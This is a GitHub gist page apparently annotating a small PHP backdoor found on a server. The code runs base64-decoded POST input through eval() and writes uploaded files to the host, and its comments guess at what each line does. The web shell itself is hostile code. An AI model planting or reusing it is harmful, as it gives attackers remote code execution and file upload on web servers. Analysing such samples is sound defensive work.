Created
July 10, 2018 19:21
-
-
Save d0n601/c33c4c127d118e42c9df69e0ce936aaf to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| echo 7457737+736723; // Still probably an id of some sort. | |
| eval(base64_decode(($_POST[id])); // Decodes POST['id'], that becomes the file name given to the eval() function. | |
| // Probably an 'all good' response from the remote server. | |
| if( $_POST['up'] == 'up') { | |
| @copy($_FILES['file']['tmp_name'], $_FILES['file']['name']); // Malicious files from remote server copied to host. | |
| } | |
| ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment